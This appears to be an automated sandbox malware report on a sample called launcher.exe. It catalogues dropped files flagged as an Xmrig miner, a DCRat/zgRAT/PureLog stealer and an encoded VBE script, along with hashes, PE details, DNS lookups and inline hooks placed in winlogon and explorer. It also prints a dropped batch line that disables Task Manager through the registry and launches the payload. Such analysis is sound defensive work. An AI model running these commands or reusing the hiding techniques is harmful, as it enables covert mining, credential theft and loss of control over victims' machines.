Preview:	ElfChnk.....................................P@...A....G)....................................................................~C`.................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F....................................................................+..............................................&.......9......................*.................z...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	68120
Entropy (8bit):	4.2171542375899005
Encrypted:	false
SSDEEP:	384:ghFRShFRkvnQHoIMtvTgo6SDuWNsZomSepnoa0So9ho0MtP7o0MtWcHgHo0Mt8o5:skgbbLyMbVKDGr1
MD5:	DD2C25368274CD19617C141484F5BC80
SHA1:	A936D61CBC3663DC0018B3A9F5A0D2DF23D90B03
SHA-256:	1A6FE41E407265CDBDD9050FD7657780332FCD208CAA49789DBAC2F6AC948BED
SHA-512:	0E59A929E88FA1340111DE537638702148E9A5F75D1745708BFEDBBBF6C2C50773B8EE59837D39C0BA91B3C1403F08697DFDEB7558E8A05CE1BDB5215424FA28
Malicious:	false
Preview:	ElfChnk.................,6......,6...................g.=............................................................................................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......,6......U>..sc........p..\|&.......p..\|U.aS0...G...?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2418146787134437702238208.000000
Category:	dropped
Size (bytes):	83072
Entropy (8bit):	4.455812613315437
Encrypted:	false
SSDEEP:	384:MFRxMxB+a19crJ0+zFRxMxB+a19crJ0+IPOzwWDaYyyMqUv52b/+DwwUh3ONwRlZ:6Y+vY++zDwj3a+nbjGx8tSDUY+ttx
MD5:	9FE057517FE3214DB967FA69B5C2121D
SHA1:	A39B7CD153F0F4AB1100118FFA984F4F3AA19D45
SHA-256:	97D540AE9F02AC3AC8E192F4E9F8B41309A839D429EDB9EE199E9CEACEE97338
SHA-512:	0EFBE327DE366249FD2138B93CF00747595B7B284A1B5506C99114F66D2A8A4AB775ABE8D16D21D554A7B95F408B0ECC6956EE7D2E45E884D77CAD6B1BBE88C9
Malicious:	false
Preview:	ElfChnk.................;.......D...........(........V........................................................................P.................@...s...h...............h...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...............................&...............................................................................................................**..0...;.......U>..sc.........:..&........:.....^R;e...n.;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	240544
Entropy (8bit):	3.8373842364984743
Encrypted:	false
SSDEEP:	1536:/zHXmrhvt0tatPEClHf80120lzHXmrhvt0tatPEClHf80120hvEomolmBL4L25Zg:djwG
MD5:	91EF76363498F8A48200279CDF812119
SHA1:	205D2221C88F6BB26EDB743952BCB96316960D9C
SHA-256:	6FE493286899CAF76DB58DE83409452D813DF306229A4CA0C5ADD3CE5C9B46BE
SHA-512:	0BD624DFE7B86D80378E63A021B704CF7CDDBBB4570464725AE08E4C2E58EE8B4100962138E64F58D917FFD9E6271DCD4FFC47AC779BD9895D2D77E73664AF2A
Malicious:	false
Preview:	ElfChnk.................y...................X...(.../..<.................................................................... qY[............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............&.......................................................................................................**......y...........sc.........g."&........g.".e.Ww....j.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Temp\__PSScriptPolicyTest_hbdlpp0s.tyz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_l5nl5ixq.veq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_oyzw5tqr.cae.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_zdfsr1ql.2rr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\ylbujkauzmzd.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5536256
Entropy (8bit):	6.689058470432344
Encrypted:	false
SSDEEP:	98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
MD5:	8FA2F1BA9B9A7EA2B3C4DD627C627CEC
SHA1:	358E3800286E5D4C5662366AD7311BC5A51BA497
SHA-256:	78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
SHA-512:	74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\ylbujkauzmzd.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\ylbujkauzmzd.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\ylbujkauzmzd.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\ylbujkauzmzd.tmp, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................\|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

C:\fontdriversavescrt\ComComponentDriverInto.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2037760
Entropy (8bit):	7.57286481558968
Encrypted:	false
SSDEEP:	24576:M43biEEJLZQm46EQplf+3dh48EywAGiGHMwlo9O/UVGxP00J+LdkikGBKBJmnRQT:Z8Y6EQv+PDJc/UVGxP008dhcynRQC
MD5:	8D58BE13EEEE305849826F3565270495
SHA1:	764FFFA3DC6BB1F6F623D79E463E91F55C39B143
SHA-256:	0885BC58CD5A6F959A45896714DEDEDE1B8B325B2F25E1C6D94D29E113C16CB5
SHA-512:	9EBC64E96217F09F70C84EDC0B0B64D60134C675FBCA4BFBCA02360507B98A95389A1FE9F4688898CBD97D146C24F9CA06C6CF78AAF1C9578C0CF64B2C9A1D0E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....zg................................. ...@....@.. ....................................@..................................-..K....@.. ....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B........................H...........t...........@....K..S-.......................................0..........(.... ........8........E................9...8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........L...@...............8....8A... ....8........~....(4...~....(8... ....<.... ....8....r...ps....z~....(,... .... .... ....s....~....(0....... ....~....{n...:W...& ....8L......... ....~....{\|...:2...& ....8'...~....:...

C:\fontdriversavescrt\OHRUZlNyrkuiImPm8IL2cpmlknwyRgjXew4XDjDWHSF.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	212
Entropy (8bit):	5.2135811634544265
Encrypted:	false
SSDEEP:	6:T2u3StuH1jhRiI36B5T6rnTQYAfzGBIbNA:TJTVjhR1365T6b8tL0KNA
MD5:	65E7F71966F823F7B9E3D2B5F5F1008C
SHA1:	5FE168632A5710DAD2DA9DBE679BA84C5BA6431D
SHA-256:	507F22E1BA71FB597207ECE1889BC2C32D0472CF11BC5E3DA713E34204C2050E
SHA-512:	56FC7DF5B3B519B03ABE5F7268EA7690395BFDBC994BFC64ADE17998C790075E3219966773E8D8C98EDC3C8FFCF06389425399AB28921905299ABB287F3EC3C6
Malicious:	false
Preview:	%LayUVekp%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%iQdwXQAkqV%..%xSceeFiN%"%SystemDrive%\fontdriversavescrt/ComComponentDriverInto.exe"%lmsiyu%

C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	251
Entropy (8bit):	5.869405236342486
Encrypted:	false
SSDEEP:	6:GYgwqK+NkLzWbH1rFnBaORbM5nCIjHx8Ln0Uj83T4/NYUqrFdu:GYBMCzWL1hBaORbQCIja6FrFdu
MD5:	33EF80F1D0BF92148B2B4030624E6101
SHA1:	03D151E3DB14476EF74167BC972CF3D034F8FEC4
SHA-256:	898A085B6AA1BB6B8F8C15E3EF98225FBCDB5C0B4330924CFFA11F97F8870C06
SHA-512:	B38DCCF884D0C5BDE46441CBF12A9E32DA156149133CFC8427972751BD06A953AB25681886E4698B9E285322CDA7C1115A7C485BAA2588213574C4B3D8C03EA4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^4gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v 0!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPrYUXdD+sfDb\.Yz6WUY9Dr-.D/m-+kmDD&&r_I`}s1z.0ErqsK:RqJ+1w:sV.hzIT%o+AW(GLfqCUoR(lOJBPTS,0l^d+dEoAAA==^#~@.

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\launcher.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	67
Entropy (8bit):	4.145666944183169
Encrypted:	false
SSDEEP:	3:3ROsRGTQ1WYyEy:3RjGTQ1WYyZ
MD5:	4B90592F63FF3D8590A55FCEFE451536
SHA1:	81F43AE54E1AF027F8FCB69B478D328257C050FF
SHA-256:	64A81CD183D83D5AC3758190788D39D43A904FF50183F273ED79934FBE7E6D97
SHA-512:	72BFD39BB35043B955F1F4C2BCB61676E1DC085070B3FBBE17D2B4F207C08B791FBAB328ADCF106332AB4199720E73B82F8072A8DFBD7666DEE87D1AD961825E
Malicious:	false
Preview:	Shika cannot start in archive!..Please extract Shika to a folder!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.988671143795974
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	launcher.exe.bin.exe
File size:	7'539'712 bytes
MD5:	ff391ed9e21485241544944ec6f4a3f0
SHA1:	bd7b5ce885c4684e05c1e937e46e9ef4ad06548c
SHA256:	619ce969d1ec179adf72a87b08468986fa2cb537229a5e8fd03d00856f502200
SHA512:	b9e9beffde62433911ac96fa3461f5c453dc10c6c760d2a7aa6df04573d1661d064cdcbe49507cecd59238410a671e1aeebf2858235ec9a31b91b5891203d5eb
SSDEEP:	98304:MHAnOWlogrB1cyZ/KHH3+nnE6ohJMWLXfdYzOn5BNNARHjdSC8BHeqz:MHADlogrBayZ/K02hJuc4RZV8FeM
TLSH:	A1763307FA93C417C4B8437972D853FF9C0C87B6A6B6919D9BE4E02684CE03A7672578
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Q......................r.............. ....@...........................t............................................

File Icon


Icon Hash:	075b59c9c9d99306

Static PE Info

General

Entrypoint:	0x401ae1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x51BC99EC [Sat Jun 15 16:44:28 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d5d9d937853db8b666bd4b525813d7bd

Entrypoint Preview

Instruction
call 00007F9BA8E216D1h
mov dword ptr [0040300Bh], eax
push 00000000h
call 00007F9BA8E216DDh
mov dword ptr [00403013h], eax
call 00007F9BA8E216DFh
mov dword ptr [00403C70h], eax
push 0000000Ah
push dword ptr [0040300Bh]
push 00000000h
push dword ptr [00403013h]
call 00007F9BA8E20B5Fh
push 00000000h
call 00007F9BA8E21688h
int3
jmp dword ptr [0040207Ch]
jmp dword ptr [00402008h]
jmp dword ptr [0040200Ch]
jmp dword ptr [00402010h]
jmp dword ptr [00402014h]
jmp dword ptr [00402018h]
jmp dword ptr [0040201Ch]
jmp dword ptr [00402020h]
jmp dword ptr [00402024h]
jmp dword ptr [00402028h]
jmp dword ptr [0040202Ch]
jmp dword ptr [00402030h]
jmp dword ptr [00402034h]
jmp dword ptr [00402038h]
jmp dword ptr [0040203Ch]
jmp dword ptr [00402040h]
jmp dword ptr [00402044h]
jmp dword ptr [00402048h]
jmp dword ptr [0040204Ch]
jmp dword ptr [00402050h]
jmp dword ptr [00402054h]
jmp dword ptr [00402058h]
jmp dword ptr [00402000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20bc	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x72eddc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0xbc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc26	0xe00	a941ede160cf12509be8dd37ae2b6a57	False	0.47935267857142855	data	5.1463325678068115	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x4c0	0x600	930587e8eece4537e4be6a4476dc03fa	False	0.4055989583333333	data	4.212357479426224	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3000	0xd6f0	0x600	7f95694b637a8e9d84e496462c4af938	False	0.16927083333333334	data	1.7255508052001818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x11000	0x72eddc	0x72ee00	3e3f1e047de342edefe0d0ba65ef9e57	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x11178	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.500916834260026
RT_RCDATA	0x219a0	0x538768	data	0.9603681564331055
RT_RCDATA	0x55a108	0x1bc6e0	data	0.997711181640625
RT_RCDATA	0x7167e8	0x2950e	data	0.9914849612952786
RT_RCDATA	0x73fcf8	0xd0	data	0.8076923076923077
RT_GROUP_ICON	0x73fdc8	0x14	data	1.15

Imports

DLL	Import
shlwapi.dll	PathFindFileNameA
kernel32.dll	LockResource, lstrlenA, CloseHandle, CreateFileA, ExitProcess, FindResourceA, FreeResource, GetCommandLineA, GetEnvironmentVariableA, GetFileSize, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, GetProcessHeap, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GlobalAlloc, GlobalFree, HeapAlloc, HeapFree, LoadLibraryA, LoadResource, lstrcpynA, RtlMoveMemory, SetFileAttributesA, SizeofResource, WriteFile, lstrcatA, lstrcpyA
user32.dll	CreateWindowExA, DefWindowProcA, DispatchMessageA, GetMessageA, LoadCursorA, LoadIconA, MessageBoxA, PostQuitMessage, RegisterClassExA, SendMessageA, ShowWindow, TranslateMessage, UpdateWindow

Network Behavior

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 16:26:12.258702993 CET	1.1.1.1	192.168.2.12	0xfc53	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:26:12.258702993 CET	1.1.1.1	192.168.2.12	0xfc53	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:26:12.258729935 CET	1.1.1.1	192.168.2.12	0xfc53	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:26:12.258729935 CET	1.1.1.1	192.168.2.12	0xfc53	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:26:14.275784969 CET	1.1.1.1	192.168.2.12	0xdacf	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:26:14.275784969 CET	1.1.1.1	192.168.2.12	0xdacf	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:28:14.266611099 CET	1.1.1.1	192.168.2.12	0x32de	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:28:14.266611099 CET	1.1.1.1	192.168.2.12	0x32de	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
ZwResumeThread	INLINE	winlogon.exe, explorer.exe
NtDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
ZwDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
NtEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe
ZwEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
NtResumeThread	INLINE	winlogon.exe, explorer.exe
RtlGetNativeSystemInformation	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
NtEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe

Processes

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	10:25:54
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\launcher.exe.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\launcher.exe.bin.exe"
Imagebase:	0x400000
File size:	7'539'712 bytes
MD5 hash:	FF391ED9E21485241544944EC6F4A3F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:25:55
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\hs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\hs.exe"
Imagebase:	0x7ff7c3f60000
File size:	6'008'408 bytes
MD5 hash:	8E222E8F9A186F8D21BF2895E1946853
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
